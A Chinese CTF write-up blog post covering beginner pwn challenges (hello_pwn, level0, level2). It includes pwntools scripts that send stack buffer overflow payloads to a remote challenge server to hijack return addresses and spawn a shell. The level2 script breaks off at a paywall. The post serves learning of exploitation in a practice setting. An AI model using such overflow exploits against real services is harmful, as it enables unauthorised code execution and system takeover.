攻防世界 pwn新手区 wp

缓冲区溢出与格式化字符串漏洞利用
最新推荐文章于 2023-04-17 15:49:34 发布
原创 最新推荐文章于 2023-04-17 15:49:34 发布 · 604 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细介绍了多个缓冲区溢出和格式化字符串漏洞的利用方法,包括计算偏移量、构造exploit payload以及利用系统函数获取shell。涉及到的技巧包括栈溢出、地址计算、shellcode注入等,展示了在不同场景下如何利用这些漏洞来控制系统执行流程。

get-shell

Snipaste_2021-10-04_09-31-39

此题是经典入门题,没有设置任何漏洞,直接给了shell

直接nc连上,然后ls,最后cat flag即可

hello_pwn

Snipaste_2021-10-04_09-35-53

Snipaste_2021-10-04_09-36-00

发现只要让dword_60106C == 1853186401就可以拿到flag

read函数将把数据读入unk_601068中,要想办法让数据覆盖到dword_60106C,所以查看两个数据内存

Snipaste_2021-10-04_09-38-48

计算距离为4,写个exp即可

from pwn import *

p = remote('111.200.241.244', '56851')
p.recvuntil(b" ~~     ")
p.recvuntil(b"bof\n") #puts会自动换行
payload = b'a' * 4 + p64(0x6E756161)
p.sendline(payload)
p.interactive()

p.recvuntil有没有都行

level0

请添加图片描述

Snipaste_2021-10-04_09-42-05

main函数很简单,看到read,猜测是溢出题

然后找到了这个函数

Snipaste_2021-10-04_09-43-56

去数据里看看
请添加图片描述

r是return address,所以只要让函数返回的地方ip是callsystem的地址就行了

Snipaste_2021-10-04_09-45-36

计算记录 128 + 8 = 136

写出exp

from pwn import *

p = remote('111.200.241.244', '56851')
payload = b'a' * 136 + p64(0x400596)
p.sendline(payload)
p.interactive()

level2

Snipaste_2021-10-04_09-51-36

Snipaste_2021-10-04_09-51-44

进去主函数,发现read,应该还是溢出题

但是并没有找到获取shell的system,这题要自己设置

先找到bin/sh的位置

Snipaste_2021-10-04_09-53-50

再看看数据的位置

请添加图片描述

计算距离

136 + 4 = 140

exp如下

from pwn import *

p = remote('', '')
e = ELF("./level2")
sysaddr = e.symbols['system']
payload = b'a' * 140 + p32(sysaddr) + p32(0) + p32
最低0.47元/天 解锁文章
gxhhh191
关注
攻防世界pwn新手整理
Lenard404的博客
08-19 3384
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
攻防世界-pwn 新手练习
hanqdi_的博客
02-24 2687
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
攻防世界pwn新手wp(通俗易懂)
njh18790816639的博客
03-10 2248
get_shell 这道题先看看附件,探查一下信息,再用ida打开,就可以发现伪代码其实很简单的: 然后在远程连接这个端口进行攻击了。 并且我们能看到它的大致防护信息,然后来个脚本: 此时就可以进行攻击了。 这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试: 大概的知道了一些漏洞,和一点信息,我们就可以进行破解了。 ...
攻防世界pwn新手
cm_zl
04-27 555
level2 guess num int overflow level0 level3 level2 ## guess num ## int overflow ## level0 level3
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2814
攻防世界hello pwn WPpwn入门基础题)的简单讲解
攻防世界pwn新手练习-hello_pwn
优快云_sunrise的博客
08-28 827
hello_pwn查看基本信息并运行文件 查看基本信息并运行文件
pwn攻防世界 pwn新手wp
woodwhale的博客
08-10 7418
pwn攻防世界 pwn新手wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
攻防世界PWN新手WP
weixin_45461609的博客
02-23 1995
攻防世界PWNget shellwhen did you bornhello_pwnlevel2待更新 get shell nc + 地址 直接连接cat flag when did you born 运行一遍,报错,段错误,栈溢出 拖进IDA 可以观察到当v5==1926的时候就会cat flag 但是当v5 == 1926 的时候又会报错 观察到这里还有一个v4而且是栈溢出的点 不妨点进去...
攻防世界 Pwn 新手
yongbaoii的博客
10-04 4228
是一个总结与汇总,会把见到的思路,想法,wp都记录下来,并进行简单的分类 这里面的每个题我都没有去检查保护,太麻烦,新手也没有需要绕过保护的,最简单的canary绕过也在进阶。 ps:我这里用的是python2.7。如果用python3的话代码会有一个致命的不同,看我的另外一篇博客 字符串编码解决python3 payload=‘a‘ +p64(1926)报错问题 01 get_shell 1、nc连接就行2、简单的exp from pwn import* r=remote("220.249.52.133
攻防世界 pwn 新手练习 hello_pwn
ChaoYue_miku的博客
07-06 715
题目来源: NUAACTF 题目描述:pwn!,segment fault!菜鸡陷入了深思 ** 0、下载附件,使用checksec检查保护情况,尝试打开文件 ** 开启了NX部分RELRO ** 1、使用IDA 64 Pro打开文件 ** 查看main函数 发现了一个read函数,查看一下unk_601068的栈结构 这里是存在栈溢出的,只要覆盖4个字节的内容就可以更改dword_60106C的内容。 接着往后查看main函数: 有一个if条件判断,只要满足dword_60106C == 18531
pwn学习-攻防世界新手
qq_45653588的博客
12-20 1625
文章目录0X00 hello_pwn0X01 when_did_you_born0X02 level00X03 level20x04 CGfsb0x05 guess_num0x06 cgpwn20x07 int_overflow0x08 level30x09 string 0X00 hello_pwn 下载文件,拖入Ubuntu用checksec查看,64位文件,开启了NX保护。 拖入ida查看,read函数读取输入赋值给unk_601068,然后判断dword_60106C是否等于nuaa,相等则执行s
adworld攻防世界-pwn-新手-wp
令则
03-05 1390
adworld-pwn-新手 tcl 到现在才算是正经昨晚攻防世界的pwn新手, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
攻防世界pwn新手练习——level0
smsyz2019的博客
10-31 1778
这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件,将程序放进虚拟机中 拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序,只开启了NX保护。NX保护简单来说就是代码不可执行。 例如你向栈上输入一段shellcode,那么NX保护就是防止这个shellcode的执行。 具体内容和其他的程序保护可以参考这个博客。l...
攻防世界pwn新手练习-level0
优快云_sunrise的博客
08-29 540
level0查看基本信息并运行文件在IDA中分析exp 查看基本信息并运行文件 查看文件类型: file level0 查看保护: checksec --file=level0 运行文件:./level0 该文件在我的电脑中的文件名为level0 在IDA中分析 文件64位,将其拖入64位ida中。 按Space切换视图 按F5生成伪代码 发现另外一个函数: 分析: 我们只需要调用callsystem()函数就可以得到flag,而vulnerable_function()函数中调用了read()函数,
攻防世界pwn新手练习-when_did_you_born
优快云_sunrise的博客
08-26 358
when_did_you_born查看基本信息并运行文件在IDA中分析 查看基本信息并运行文件 查看文件类型: file when_did_you_born 查看保护: checksec --file=when_did_you_born 运行文件:./when_did_you_born 在IDA中分析 文件64位,将其拖入64位ida中。 按 ...
攻防世界闯关记录_pwn新手
s1054436218的博客
10-02 843
  开个新坑,记录自己刷XCTF攻防世界pwn题,因为刚入门吧,从新手篇开始练起。这次一边做题一边写笔记和writeup,巩固一下自己学到的东西。 get_shell   这道题我不太想写writeup……做过的人肯定明白 CGfsb   这道题其实是一道非常简单的格式化字符串题,凭借着自己对格式化字符串的记忆,以及大量动态调试,最后还是把这道题做出来了。记录一下自己调试的过程吧,随便找...
PWN入门分享
热门推荐
CK_0ff的博客
02-08 1万+
文章目录什么是PWNPWN的前置技能可执行文件常见漏洞基础环境环境配置步骤栈溢出漏洞栈函数调用栈ELF文件文件保护机制CanaryNXPIE(ASLR)RELROlinux内存布局结语 pwn基础入门分享 什么是PWN? 以下内容摘自百度百科: ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了 。 ​ PWN也可译为二进制漏洞挖掘,在CTF比赛中,PWN题的目标是拿到flag,一般是在l
攻防世界pwn新手题解-level3
weixin_62621015的博客
04-17 1646
攻防世界pwn-level3详细题解。
攻防世界 pwn
清霂的博客
02-02 767
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考CTF-wiki上对格式化字符串的总结。另外,还可以利用栈溢出漏洞来实现攻击。栈溢出漏洞的原理是当输入的数据超过了栈的缓冲大小时,会覆盖到相邻的内存域,包括函数返回地址等重要信息。通过溢出覆盖system函数的参数为"/bin/sh",就可以获取到shell权限。在IDA32中,可以通过查看字符串窗口,找到可以直接利用的字符串,比如system和/bin/sh。这样就可以猜测需要溢出覆盖system函数的参数,实现获取shell的目的。123 #### 引用[.reference_title] - *1* *2* [xctf攻防世界pwn基础题解(新手食用)](https://blog.youkuaiyun.com/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *3* [攻防世界 pwn 二进制漏洞简单题练习 答题(1-10题解)](https://blog.youkuaiyun.com/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值